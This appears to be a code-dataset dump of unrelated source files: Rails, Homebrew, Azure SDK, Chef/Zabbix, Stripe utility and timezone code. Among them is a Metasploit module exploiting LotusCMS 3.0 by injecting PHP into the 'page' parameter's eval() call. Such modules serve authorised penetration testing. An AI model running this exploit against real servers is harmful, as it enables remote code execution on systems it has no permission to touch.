Dir[File.expand_path("#{File.dirname(__FILE__)}/#{dir}/*.rb")].sort.each do |file|
require(file)
end
end
require File.join(File.dirname(__FILE__), 'extensions/array_extension')
require File.join(File.dirname(__FILE__), 'extensions/action_view_extension')
require File.join(File.dirname(__FILE__), 'extensions/active_record_extension')
require File.join(File.dirname(__FILE__), 'extensions/action_controller_extension')
module WillFilter
class Railtie < ::Rails::Railtie #:nodoc:
initializer 'will_filter' do |app|
ActiveSupport.on_load(:active_record) do
::ActiveRecord::Base.send :include, WillFilter::ActiveRecordExtension
end
ActiveSupport.on_load(:action_view) do
::ActionView::Base.send :include, WillFilter::ActionViewExtension
end
ActiveSupport.on_load(:action_controller) do
include WillFilter::ActionControllerExtension
end
end
end
end | 38.545455 | 86 | 0.748113 |
612c108c5e6c4251d43a8775f9e298d2eb87cd59 | 1,258 | class Automake < Formula
desc "Tool for generating GNU Standards-compliant Makefiles"
homepage "https://www.gnu.org/software/automake/"
url "http://ftpmirror.gnu.org/automake/automake-1.15.tar.xz"
mirror "https://ftp.gnu.org/gnu/automake/automake-1.15.tar.xz"
sha256 "9908c75aabd49d13661d6dcb1bc382252d22cc77bf733a2d55e87f2aa2db8636"
bottle do
cellar :any
revision 2
sha256 "70a763221d2bb9baaf630f2170224c915ca96a9966fbb1d86781c8743740bb7b" => :el_capitan
sha256 "d8e4773130e25ff576a0c7d18b4d010b1e03eba90b0074e1ac749fdf3bc13e26" => :yosemite
sha256 "69c1635672fa682a40949572e64fe3495055e97ad2c105dd46fb2e447d0d65a8" => :mavericks
sha256 "6e6fdaa7fb7ddaaeb103341d1ca351e0669874f86eb21eb6623cb345dd1f5b6f" => :mountain_lion
end
depends_on "autoconf" => :run
keg_only :provided_until_xcode43
def install
ENV["PERL"] = "/usr/bin/perl" if OS.mac?
system "./configure", "--prefix=#{prefix}"
system "make", "install"
# Our aclocal must go first. See:
# https://github.com/Homebrew/homebrew/issues/10618
(share/"aclocal/dirlist").write <<-EOS.undent
#{HOMEBREW_PREFIX}/share/aclocal
/usr/share/aclocal
EOS
end
test do
system "#{bin}/automake", "--version"
end
end
| 32.25641 | 95 | 0.740859 |
617d731b24746f7c6c9db5b20f2dc0c91fb2a95c | 1,438 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Monitor::Mgmt::V2019_03_01
module Models
#
# Represents a baseline metadata value.
#
class BaselineMetadata
include MsRestAzure
# @return [String] Name of the baseline metadata.
attr_accessor :name
# @return [String] Value of the baseline metadata.
attr_accessor :value
#
# Mapper for BaselineMetadata class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'BaselineMetadata',
type: {
name: 'Composite',
class_name: 'BaselineMetadata',
model_properties: {
name: {
client_side_validation: true,
required: true,
serialized_name: 'name',
type: {
name: 'String'
}
},
value: {
client_side_validation: true,
required: true,
serialized_name: 'value',
type: {
name: 'String'
}
}
}
}
}
end
end
end
end
| 24.793103 | 70 | 0.515994 |
792ab44f43ef4d2dcd06f0fe9ad8ded03e0b6f6d | 2,867 | # encoding: UTF-8
# This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 20180825151357) do
# These are extensions that must be enabled in order to support this database
enable_extension "plpgsql"
enable_extension "postgis"
create_table "about", force: true do |t|
t.string "intro"
t.text "description"
t.datetime "created_at"
t.datetime "updated_at"
end
create_table "active_admin_comments", force: true do |t|
t.string "namespace"
t.text "body"
t.string "resource_id", null: false
t.string "resource_type", null: false
t.integer "author_id"
t.string "author_type"
t.datetime "created_at"
t.datetime "updated_at"
end
add_index "active_admin_comments", ["author_type", "author_id"], :name => "index_active_admin_comments_on_author_type_and_author_id"
add_index "active_admin_comments", ["namespace"], :name => "index_active_admin_comments_on_namespace"
add_index "active_admin_comments", ["resource_type", "resource_id"], :name => "index_active_admin_comments_on_resource_type_and_resource_id"
create_table "admin_users", force: true do |t|
t.string "email", default: "", null: false
t.string "encrypted_password", default: "", null: false
t.string "reset_password_token"
t.datetime "reset_password_sent_at"
t.datetime "remember_created_at"
t.integer "sign_in_count", default: 0, null: false
t.datetime "current_sign_in_at"
t.datetime "last_sign_in_at"
t.string "current_sign_in_ip"
t.string "last_sign_in_ip"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
add_index "admin_users", ["email"], :name => "index_admin_users_on_email", :unique => true
add_index "admin_users", ["reset_password_token"], :name => "index_admin_users_on_reset_password_token", :unique => true
create_table "projects", force: true do |t|
t.string "title"
t.string "subtitle"
t.string "description"
t.string "languages"
t.datetime "created_at"
t.datetime "updated_at"
end
end
| 40.957143 | 142 | 0.709452 |
4a8604aa20aa506ffd9cfcd78a5602b94b2002fb | 7,488 | #
# Cookbook Name:: bcpc
# Recipe:: zabbix-head
#
# Copyright 2013, Bloomberg Finance L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
include_recipe 'bcpc::apache2'
include_recipe 'bcpc::mysql'
include_recipe 'bcpc::zabbix-repo'
#
# These data bags and vault items are pre-populated at compile time by
# the bcpc::mysql_data_bags recipe.
#
root_user = get_config!('mysql-root-user')
root_password = get_config!('password', 'mysql-root', 'os')
zabbix_user = get_config!('mysql-zabbix-user')
zabbix_password = get_config!('password', 'mysql-zabbix', 'os')
bootstrap = get_bootstrap
admins_list = get_head_node_names
admins_list.push(node[:fqdn]) unless admins_list.include?(node[:fqdn])
admins_list.push(bootstrap) unless bootstrap.nil?
zabbix_admin_user = 'Admin'
make_config('zabbix-admin-user', zabbix_admin_user)
zabbix_admin_password =
get_config('password','zabbix-admin','os') || secure_password
chef_vault_secret 'zabbix-admin' do
data_bag 'os'
raw_data({ 'password' => zabbix_admin_password })
admins admins_list.join(',')
search '*:*'
action :nothing
end.run_action(:create_if_missing)
#
# At this point, if we cannot retrieve the pw from the vault, the chef
# run should be aborted.
#
zabbix_admin_password = get_config!('password','zabbix-admin','os')
zabbix_guest_user = 'guest'
make_config('zabbix-guest-user', zabbix_guest_user)
user node[:bcpc][:zabbix][:user] do
shell '/bin/false'
home '/var/log'
gid node[:bcpc][:zabbix][:group]
system true
end
directory '/var/log/zabbix' do
user node[:bcpc][:zabbix][:user]
group node[:bcpc][:zabbix][:group]
mode 0755
end
# Stop the old service if we find the old service definition
service 'zabbix-server' do
action :stop
only_if { File.exist?('/etc/init/zabbix-server.conf') }
end
# Remove the old service definition from the source-based build.
file '/etc/init/zabbix-server.conf' do
action :delete
end
[
'zabbix-server-mysql',
'zabbix-frontend-php'
].each do |package_name|
package package_name do
action :upgrade
end
end
template '/etc/zabbix/zabbix_server.conf' do
source 'zabbix/server.conf.erb'
owner node[:bcpc][:zabbix][:user]
group 'root'
mode 0600
notifies :restart, 'service[zabbix-server]', :delayed
end
mysql_database node[:bcpc][:zabbix_dbname] do
connection mysql_local_connection_info
encoding 'UTF8'
action :create
notifies :run, 'execute[zabbix-create-database]', :immediately
end
[
'%',
'localhost'
].each do |host_name|
mysql_database_user zabbix_user do
connection mysql_local_connection_info
host host_name
password zabbix_password
action :create
end
mysql_database_user zabbix_user do
connection mysql_local_connection_info
database_name node[:bcpc][:zabbix_dbname]
host host_name
privileges ['ALL PRIVILEGES']
action :grant
end
end
execute 'zabbix-create-database' do
command "gunzip -c /usr/share/doc/zabbix-server-mysql/create.sql.gz | mysql -u #{root_user} " \
"--password=#{root_password} " \
"#{node[:bcpc][:zabbix_dbname]}"
sensitive true if respond_to?(:sensitive)
action :nothing
end
mysql_database 'zabbix-set-admin-password' do
connection mysql_local_connection_info
database_name node[:bcpc][:zabbix_dbname]
sql "UPDATE users SET passwd=md5('#{zabbix_admin_password}') " \
"WHERE alias='#{zabbix_admin_user}'"
action :query
end
mysql_database "zabbix-set-guest-password" do
connection mysql_local_connection_info
database_name node[:bcpc][:zabbix_dbname]
sql "UPDATE users SET passwd=md5('') " \
"WHERE alias='#{zabbix_guest_user}'"
action :query
end
[
'tuning.sql',
'leader_election.sql'
].each do |file_name|
install_path = File.join(Chef::Config.file_cache_path, file_name)
resource_name = "zabbix-run-#{file_name.gsub(/\./,'-')}"
template install_path do
source "zabbix/#{file_name}.erb"
variables(
:history_retention =>
node['bcpc']['zabbix']['retention_history'],
:storage_retention =>
node['bcpc']['zabbix']['retention_default']
)
owner 'root'
group 'root'
mode 0644
notifies :run, "execute[#{resource_name}]", :immediately
end
execute resource_name do
command "mysql -u #{root_user} " \
"--password=#{root_password} " \
"#{node[:bcpc][:zabbix_dbname]} " \
"< #{install_path}"
sensitive true if respond_to?(:sensitive)
action :nothing
end
end
ruby_block 'zabbix-elect-leader' do
block do
require 'mysql2'
require 'timeout'
client_options =
mysql_local_connection_info.merge(database: node[:bcpc][:zabbix_dbname])
client =
Mysql2::Client.new(client_options)
results = client.query("CALL elect_leader('#{node[:hostname]}')")
Chef::Log.info('Zabbix leader election results: ' + results.inspect)
end
end
service 'zabbix-server' do
action [:enable, :start]
end
%w{traceroute php5-mysql php5-gd}.each do |pkg|
package pkg do
action :upgrade
end
end
file '/etc/php5/apache2/conf.d/zabbix.ini' do
user 'root'
group 'root'
mode 00644
content <<-EOH
post_max_size = 16M
max_execution_time = 300
max_input_time = 300
date.timezone = America/New_York
EOH
notifies :run, 'ruby_block[run_state_apache2_restart]', :immediate
end
directory '/etc/zabbix/web' do
mode 0555
recursive true
end
template '/etc/zabbix/web/zabbix.conf.php' do
source 'zabbix/zabbix.conf.php.erb'
user node[:bcpc][:zabbix][:user]
group 'www-data'
mode 0640
notifies :run, 'ruby_block[run_state_apache2_restart]', :immediate
end
#
# a2ensite for httpd 2.4 (Ubuntu 14.04) expects the file to end in '.conf'
# a2ensite for httpd 2.2 (Ubuntu 12.04) expects it NOT to end in '.conf'
#
zabbix_web_conf_file =
if Gem::Version.new(node[:lsb][:release]) >= Gem::Version.new('14.04')
'/etc/apache2/sites-available/zabbix-web.conf'
else
'/etc/apache2/sites-available/zabbix-web'
end
template zabbix_web_conf_file do
source 'apache-zabbix-web.conf.erb'
owner 'root'
group 'root'
mode 00644
notifies :run, "ruby_block[run_state_apache2_restart]", :immediate
end
execute 'apache-enable-zabbix-web' do
user 'root'
command 'a2ensite zabbix-web'
not_if 'test -r /etc/apache2/sites-enabled/zabbix-web*'
notifies :run, 'ruby_block[run_state_apache2_restart]', :immediate
end
include_recipe 'bcpc::zabbix-work'
directory '/usr/local/bin/checks' do
action :create
owner node[:bcpc][:zabbix][:user]
group 'root'
mode 00775
end
directory '/usr/local/etc/checks' do
action :create
owner node[:bcpc][:zabbix][:user]
group 'root'
mode 00775
end
cookbook_file '/usr/local/bin/check' do
source 'checks/check'
owner 'root'
mode 0755
end
ruby_block 'run_state_apache2_restart' do
block do
node.run_state['restart_apache2_needed'] = true
end
action :nothing
end
service 'apache2' do
action :restart
only_if { node.run_state['restart_apache2_needed'] == true }
end
| 25.297297 | 97 | 0.713809 |
627f5745eee444ba82481c886b5aa2829a54c893 | 527 | # encoding: UTF-8
# This file contains data derived from the IANA Time Zone Database
# (http://www.iana.org/time-zones).
module TZInfo
module Data
module Definitions
module Indian
module Kerguelen
include TimezoneDefinition
timezone 'Indian/Kerguelen' do |tz|
tz.offset :o0, 0, 0, :'-00'
tz.offset :o1, 18000, 0, :'+05'
tz.transition 1950, 1, :o1, -631152000, 4866565, 2
end
end
end
end
end
end
| 21.958333 | 66 | 0.555977 |
1a237c7f3d36fa0f8aec52e763b0b0c8cce4f210 | 2,038 | class Expect < Formula
desc "Program that can automate interactive applications"
homepage "https://expect.sourceforge.io/"
url "https://downloads.sourceforge.net/project/expect/Expect/5.45.4/expect5.45.4.tar.gz"
sha256 "49a7da83b0bdd9f46d04a04deec19c7767bb9a323e40c4781f89caf760b92c34"
bottle do
rebuild 1
sha256 "668b4fb12eed5bbf783e8b4ec52dad24b88f38af5577ba1e45ed9947e50e50ef" => :mojave
sha256 "a0c6ffe797dc0bbe512b628819acee67a7a9b00573b6433fe0672285d41a9df1" => :high_sierra
sha256 "fc9ad781caaf8d45f47a87d4303645faa2e600852c73fd5432f0be2e588e95f2" => :sierra
sha256 "4fcb163b1b1e7e209b632c43ba03106ca1c4e4d6a745260b813d28a803581e58" => :el_capitan
end
option "with-threads", "Build with multithreading support"
option "with-brewed-tk", "Use Homebrew's Tk (has Cocoa and threads support)"
deprecated_option "enable-threads" => "with-threads"
# Autotools are introduced here to regenerate configure script. Remove
# if the patch has been applied in newer releases.
depends_on "autoconf" => :build
depends_on "automake" => :build
depends_on "libtool" => :build
depends_on "tcl-tk" if build.with? "brewed-tk"
def install
args = %W[
--prefix=#{prefix}
--exec-prefix=#{prefix}
--mandir=#{man}
--enable-shared
--enable-64bit
]
args << "--enable-threads" if build.with? "threads"
if build.with? "brewed-tk"
args << "--with-tcl=#{Formula["tcl-tk"].opt_prefix}/lib"
else
ENV.prepend "CFLAGS", "-I#{MacOS.sdk_path}/System/Library/Frameworks/Tcl.framework/Versions/8.5/Headers/tcl-private"
args << "--with-tcl=#{MacOS.sdk_path}/System/Library/Frameworks/Tcl.framework"
end
# Regenerate configure script. Remove after patch applied in newer
# releases.
system "autoreconf", "--force", "--install", "--verbose"
system "./configure", *args
system "make"
system "make", "install"
lib.install_symlink Dir[lib/"expect*/libexpect*"]
end
test do
system "#{bin}/mkpasswd"
end
end
| 34.542373 | 122 | 0.712954 |
6243bb39120418348bbd9c2d199d18c32a86db28 | 14,066 | # frozen_string_literal: true
require "cgi"
module Stripe
module Util
# Options that a user is allowed to specify.
OPTS_USER_SPECIFIED = Set[
:api_key,
:idempotency_key,
:stripe_account,
:stripe_version
].freeze
# Options that should be copyable from one StripeObject to another
# including options that may be internal.
OPTS_COPYABLE = (
OPTS_USER_SPECIFIED + Set[:api_base]
).freeze
# Options that should be persisted between API requests. This includes
# client, which is an object containing an HTTP client to reuse.
OPTS_PERSISTABLE = (
OPTS_USER_SPECIFIED + Set[:client] - Set[:idempotency_key]
).freeze
def self.objects_to_ids(obj)
case obj
when APIResource
obj.id
when Hash
res = {}
obj.each { |k, v| res[k] = objects_to_ids(v) unless v.nil? }
res
when Array
obj.map { |v| objects_to_ids(v) }
else
obj
end
end
def self.object_classes
@object_classes ||= Stripe::ObjectTypes.object_names_to_classes
end
def self.object_name_matches_class?(object_name, klass)
Util.object_classes[object_name] == klass
end
# Adds a custom method to a resource class. This is used to add support for
# non-CRUDL API requests, e.g. capturing charges. custom_method takes the
# following parameters:
# - name: the name of the custom method to create (as a symbol)
# - http_verb: the HTTP verb for the API request (:get, :post, or :delete)
# - http_path: the path to append to the resource's URL. If not provided,
# the name is used as the path
# - resource: the resource implementation class
# - target: the class that custom static method will be added to
#
# For example, this call:
# custom_method :capture, http_verb: post
# adds a `capture` class method to the resource class that, when called,
# will send a POST request to `/v1/<object_name>/capture`.
def self.custom_method(resource, target, name, http_verb, http_path)
unless %i[get post delete].include?(http_verb)
raise ArgumentError,
"Invalid http_verb value: #{http_verb.inspect}. Should be one " \
"of :get, :post or :delete."
end
unless target.respond_to?(:resource_url)
raise ArgumentError,
"Invalid target value: #{target}. Target class should have a " \
"`resource_url` method."
end
http_path ||= name.to_s
target.define_singleton_method(name) do |id, params = {}, opts = {}|
unless id.is_a?(String)
raise ArgumentError,
"id should be a string representing the ID of an API resource"
end
url = "#{target.resource_url}/"\
"#{CGI.escape(id)}/"\
"#{CGI.escape(http_path)}"
resp, opts = resource.execute_resource_request(
http_verb,
url,
params,
opts
)
Util.convert_to_stripe_object(resp.data, opts)
end
end
# Converts a hash of fields or an array of hashes into a +StripeObject+ or
# array of +StripeObject+s. These new objects will be created as a concrete
# type as dictated by their `object` field (e.g. an `object` value of
# `charge` would create an instance of +Charge+), but if `object` is not
# present or of an unknown type, the newly created instance will fall back
# to being a +StripeObject+.
#
# ==== Attributes
#
# * +data+ - Hash of fields and values to be converted into a StripeObject.
# * +opts+ - Options for +StripeObject+ like an API key that will be reused
# on subsequent API calls.
def self.convert_to_stripe_object(data, opts = {})
opts = normalize_opts(opts)
case data
when Array
data.map { |i| convert_to_stripe_object(i, opts) }
when Hash
# Try converting to a known object class. If none available, fall back
# to generic StripeObject
object_classes.fetch(data[:object], StripeObject)
.construct_from(data, opts)
else
data
end
end
def self.log_error(message, data = {})
config = data.delete(:config) || Stripe.config
logger = config.logger || Stripe.logger
if !logger.nil? ||
!config.log_level.nil? && config.log_level <= Stripe::LEVEL_ERROR
log_internal(message, data, color: :cyan, level: Stripe::LEVEL_ERROR,
logger: Stripe.logger, out: $stderr)
end
end
def self.log_info(message, data = {})
config = data.delete(:config) || Stripe.config
logger = config.logger || Stripe.logger
if !logger.nil? ||
!config.log_level.nil? && config.log_level <= Stripe::LEVEL_INFO
log_internal(message, data, color: :cyan, level: Stripe::LEVEL_INFO,
logger: Stripe.logger, out: $stdout)
end
end
def self.log_debug(message, data = {})
config = data.delete(:config) || Stripe.config
logger = config.logger || Stripe.logger
if !logger.nil? ||
!config.log_level.nil? && config.log_level <= Stripe::LEVEL_DEBUG
log_internal(message, data, color: :blue, level: Stripe::LEVEL_DEBUG,
logger: Stripe.logger, out: $stdout)
end
end
def self.symbolize_names(object)
case object
when Hash
new_hash = {}
object.each do |key, value|
key = (begin
key.to_sym
rescue StandardError
key
end) || key
new_hash[key] = symbolize_names(value)
end
new_hash
when Array
object.map { |value| symbolize_names(value) }
else
object
end
end
# Encodes a hash of parameters in a way that's suitable for use as query
# parameters in a URI or as form parameters in a request body. This mainly
# involves escaping special characters from parameter keys and values (e.g.
# `&`).
def self.encode_parameters(params)
Util.flatten_params(params)
.map { |k, v| "#{url_encode(k)}=#{url_encode(v)}" }.join("&")
end
# Encodes a string in a way that makes it suitable for use in a set of
# query parameters in a URI or in a set of form parameters in a request
# body.
def self.url_encode(key)
CGI.escape(key.to_s).
# Don't use strict form encoding by changing the square bracket control
# characters back to their literals. This is fine by the server, and
# makes these parameter strings easier to read.
gsub("%5B", "[").gsub("%5D", "]")
end
def self.flatten_params(params, parent_key = nil)
result = []
# do not sort the final output because arrays (and arrays of hashes
# especially) can be order sensitive, but do sort incoming parameters
params.each do |key, value|
calculated_key = parent_key ? "#{parent_key}[#{key}]" : key.to_s
if value.is_a?(Hash)
result += flatten_params(value, calculated_key)
elsif value.is_a?(Array)
result += flatten_params_array(value, calculated_key)
else
result << [calculated_key, value]
end
end
result
end
def self.flatten_params_array(value, calculated_key)
result = []
value.each_with_index do |elem, i|
if elem.is_a?(Hash)
result += flatten_params(elem, "#{calculated_key}[#{i}]")
elsif elem.is_a?(Array)
result += flatten_params_array(elem, calculated_key)
else
result << ["#{calculated_key}[#{i}]", elem]
end
end
result
end
# `Time.now` can be unstable in cases like an administrator manually
# updating its value or a reconcilation via NTP. For this reason, prefer
# the use of the system's monotonic clock especially where comparing times
# to calculate an elapsed duration.
#
# Shortcut for getting monotonic time, mostly for purposes of line length
# and test stubbing. Returns time in seconds since the event used for
# monotonic reference purposes by the platform (e.g. system boot time).
def self.monotonic_time
Process.clock_gettime(Process::CLOCK_MONOTONIC)
end
def self.normalize_id(id)
if id.is_a?(Hash) # overloaded id
params_hash = id.dup
id = params_hash.delete(:id)
else
params_hash = {}
end
[id, params_hash]
end
# The secondary opts argument can either be a string or hash
# Turn this value into an api_key and a set of headers
def self.normalize_opts(opts)
case opts
when String
{ api_key: opts }
when Hash
check_api_key!(opts.fetch(:api_key)) if opts.key?(:api_key)
# Explicitly use dup here instead of clone to avoid preserving freeze
# state on input params.
opts.dup
else
raise TypeError, "normalize_opts expects a string or a hash"
end
end
def self.check_string_argument!(key)
raise TypeError, "argument must be a string" unless key.is_a?(String)
key
end
def self.check_api_key!(key)
raise TypeError, "api_key must be a string" unless key.is_a?(String)
key
end
# Normalizes header keys so that they're all lower case and each
# hyphen-delimited section starts with a single capitalized letter. For
# example, `request-id` becomes `Request-Id`. This is useful for extracting
# certain key values when the user could have set them with a variety of
# diffent naming schemes.
def self.normalize_headers(headers)
headers.each_with_object({}) do |(k, v), new_headers|
k = k.to_s.tr("_", "-") if k.is_a?(Symbol)
k = k.split("-").reject(&:empty?).map(&:capitalize).join("-")
new_headers[k] = v
end
end
# Generates a Dashboard link to inspect a request ID based off of a request
# ID value and an API key, which is used to attempt to extract whether the
# environment is livemode or testmode.
def self.request_id_dashboard_url(request_id, api_key)
env = !api_key.nil? && api_key.start_with?("sk_live") ? "live" : "test"
"https://dashboard.stripe.com/#{env}/logs/#{request_id}"
end
# Constant time string comparison to prevent timing attacks
# Code borrowed from ActiveSupport
def self.secure_compare(str_a, str_b)
return false unless str_a.bytesize == str_b.bytesize
l = str_a.unpack "C#{str_a.bytesize}"
res = 0
str_b.each_byte { |byte| res |= byte ^ l.shift }
res.zero?
end
#
# private
#
COLOR_CODES = {
black: 0, light_black: 60,
red: 1, light_red: 61,
green: 2, light_green: 62,
yellow: 3, light_yellow: 63,
blue: 4, light_blue: 64,
magenta: 5, light_magenta: 65,
cyan: 6, light_cyan: 66,
white: 7, light_white: 67,
default: 9,
}.freeze
private_constant :COLOR_CODES
# Uses an ANSI escape code to colorize text if it's going to be sent to a
# TTY.
def self.colorize(val, color, isatty)
return val unless isatty
mode = 0 # default
foreground = 30 + COLOR_CODES.fetch(color)
background = 40 + COLOR_CODES.fetch(:default)
"\033[#{mode};#{foreground};#{background}m#{val}\033[0m"
end
private_class_method :colorize
# Turns an integer log level into a printable name.
def self.level_name(level)
case level
when LEVEL_DEBUG then "debug"
when LEVEL_ERROR then "error"
when LEVEL_INFO then "info"
else level
end
end
private_class_method :level_name
def self.log_internal(message, data = {}, color:, level:, logger:, out:)
data_str = data.reject { |_k, v| v.nil? }
.map do |(k, v)|
format("%<key>s=%<value>s",
key: colorize(k, color, logger.nil? && !out.nil? && out.isatty),
value: wrap_logfmt_value(v))
end.join(" ")
if !logger.nil?
# the library's log levels are mapped to the same values as the
# standard library's logger
logger.log(level,
format("message=%<message>s %<data_str>s",
message: wrap_logfmt_value(message),
data_str: data_str))
elsif out.isatty
out.puts format("%<level>s %<message>s %<data_str>s",
level: colorize(level_name(level)[0, 4].upcase,
color, out.isatty),
message: message,
data_str: data_str)
else
out.puts format("message=%<message>s level=%<level>s %<data_str>s",
message: wrap_logfmt_value(message),
level: level_name(level),
data_str: data_str)
end
end
private_class_method :log_internal
# Wraps a value in double quotes if it looks sufficiently complex so that
# it can be read by logfmt parsers.
def self.wrap_logfmt_value(val)
# If value is any kind of number, just allow it to be formatted directly
# to a string (this will handle integers or floats).
return val if val.is_a?(Numeric)
# Hopefully val is a string, but protect in case it's not.
val = val.to_s
if %r{[^\w\-/]} =~ val
# If the string contains any special characters, escape any double
# quotes it has, remove newlines, and wrap the whole thing in quotes.
format(%("%<value>s"), value: val.gsub('"', '\"').delete("\n"))
else
# Otherwise use the basic value if it looks like a standard set of
# characters (and allow a few special characters like hyphens, and
# slashes)
val
end
end
private_class_method :wrap_logfmt_value
end
end
| 34.560197 | 79 | 0.61247 |
189ae0511ba9189aa0fbdbcfc817482432c36b84 | 70 | # Add your variables here
first_number = "luis"
second_number = "soto" | 23.333333 | 25 | 0.757143 |
03e7342fcc322bfea19c445c8da17f1cfda684e8 | 1,469 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'trelloist/version'
Gem::Specification.new do |spec|
spec.name = "trelloist"
spec.version = Trelloist::VERSION
spec.authors = ["Tumas Bajoras"]
spec.email = ["[email protected]"]
spec.summary = %q{Create trello checklists from CLI}
spec.homepage = "https://github.com/Tumas/trelloist"
spec.license = "MIT"
# Prevent pushing this gem to RubyGems.org. To allow pushes either set the 'allowed_push_host'
# to allow pushing to a single host or delete this section to allow pushing to any host.
if spec.respond_to?(:metadata)
spec.metadata['allowed_push_host'] = "TODO: Set to 'http://mygemserver.com'"
else
raise "RubyGems 2.0 or newer is required to protect against public gem pushes."
end
spec.files = `git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
spec.bindir = "exe"
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ["lib"]
spec.add_runtime_dependency 'activesupport'
spec.add_runtime_dependency 'dotenv'
spec.add_runtime_dependency 'ruby-trello'
spec.add_runtime_dependency 'thor'
spec.add_development_dependency "bundler", "~> 1.12"
spec.add_development_dependency "rake", "~> 10.0"
spec.add_development_dependency "rspec", "~> 3.0"
end
| 38.657895 | 104 | 0.6855 |
e819897e2d3eb2d547e2403b38b32f585e953931 | 883 | # TODO: Get these added to the `pretty_ruby` gem, and use that. (Note that it uses refinements, not monkey-patching.)
module Enumerable
# Allow Scheme-style `rest`.
def rest(count = 1)
drop(count)
end
# Allow Scheme-style `tail`.
def tail
return self if size.zero?
last(size - 1)
end
# Returns `true` iff all the elements are equal. Returns `false` if there are no elements.
def same?
uniq.size == 1
end
# Like `first` or `last`, but *requires* that there be exactly one element.
def only
fail IndexError, "expected to have exactly 1 element" unless size == 1
first
end
# Allow Rails-style `second`.
def second
self[1]
end
# Prefer 1-based indexing to get the `nth` element.
def nth(n) # rubocop:disable Naming/MethodParameterName
self[n - 1]
end
def map_dig(*args)
map{ |a| a.dig(*args) }
end
end
| 21.02381 | 117 | 0.657984 |
1a13c565ed636e753e38dffc736e950c49ee7e54 | 4,278 | ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::WmapScanUniqueQuery
def initialize(info = {})
super(update_info(info,
'Name' => 'LotusCMS 3.0 eval() Remote Command Execution',
'Description' => %q{
This module exploits a vulnerability found in Lotus CMS 3.0's Router()
function. This is done by embedding PHP code in the 'page' parameter,
which will be passed to a eval call, therefore allowing remote code execution.
The module can either automatically pick up a 'page' parameter from the
default page, or manually specify one in the URI option. To use the automatic
method, please supply the URI with just a directory path, for example: "/lcms/".
To manually configure one, you may do: "/lcms/somepath/index.php?page=index"
},
'License' => MSF_LICENSE,
'Author' =>
[
'Alligator Security Team',
'dflah_ <dflah_[at]alligatorteam.org>',
'sherl0ck_ <sherl0ck_[at]alligatorteam.org>',
'sinn3r' #Metasploit-fu
],
'References' =>
[
[ 'OSVDB', '75095' ],
[ 'URL', 'http://secunia.com/secunia_research/2011-21/' ]
],
'Payload' =>
{
'Space' => 4000, # only to prevent error HTTP 414 (Request-URI Too Long)
'DisableNops' => true,
'BadChars' => "#",
'Keys' => ['php']
},
'Platform' => [ 'php' ],
'Arch' => ARCH_PHP,
'Targets' => [[ 'Automatic LotusCMS 3.0', { }]],
'Privileged' => false,
'DisclosureDate' => 'Mar 3 2011',
'DefaultTarget' => 0))
register_options(
[
OptString.new('URI', [true, 'URI', '/lcms/']),
Opt::RPORT(80),
], self.class)
end
def target_url
uri = datastore['URI']
# Make sure uri begins with '/'
if uri[0] != '/'
uri = '/' + uri
end
# Extract two things:
# 1. The file path (/index.php), including the base
# 2. GET parameters from the GET query
uri = uri.scan(/^(\/.+)\/(\w+\.php)*\?*(\w+=.+&*)*$/).flatten
base = (uri[0] || "") + '/'
fname = uri[1] || ""
query = uri[2] || ""
params = queryparse(query) rescue ""
# Use the user-supplied query if there's one, if not we'll auto-detect
# by regexing a hyper-link
if base.empty? or fname.empty? or params.empty?
res = send_request_cgi({
'method' => 'GET',
'uri' => datastore['URI']
}, 20)
if res and res.code == 200
uri = res.body.scan(/<a.*href=['|"](\/*index\.php)\?.*(page=\w+)['|"].*>/).flatten
@uri = base + uri[0]
@arg = uri[1]
print_status("Using found page param: #{@uri}?#{@arg}")
else
@uri = ""
@arg = ""
end
else
@uri = base + fname
@arg = "page=#{params['page']}"
end
end
def check
target_url
if @uri.empty? or @arg.empty?
print_error("Unable to get the page parameter, please reconfigure URI")
return
end
signature = rand_text_alpha(rand(10)+10)
stub = "${print('#{signature}')};"
sploit = "');#{stub}#"
response = send_request_cgi(
{
'method' => 'POST',
'uri' => @uri,
'data' => @arg + Rex::Text.uri_encode(sploit)
}, 20)
if response and response.body =~ /#{signature}/
print_status("Signature: #{signature}")
return Exploit::CheckCode::Vulnerable
else
print_error("Signature was not detected")
return Exploit::CheckCode::Safe
end
end
def exploit
return if not check == Exploit::CheckCode::Vulnerable
begin
sploit = "');#{payload.encoded}#"
print_status("Sending exploit ...")
res = send_request_cgi(
{
'method' => 'POST',
'uri' => @uri,
'data' => @arg + Rex::Text.uri_encode(sploit)
}, 20)
handler
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end | 29.102041 | 87 | 0.583918 |
610dd9c3372923da29966a454b10bb6ba302dcb6 | 9,041 | =begin
#The Plaid API
#The Plaid REST API. Please see https://plaid.com/docs/api for more details.
The version of the OpenAPI document: 2020-09-14_1.64.13
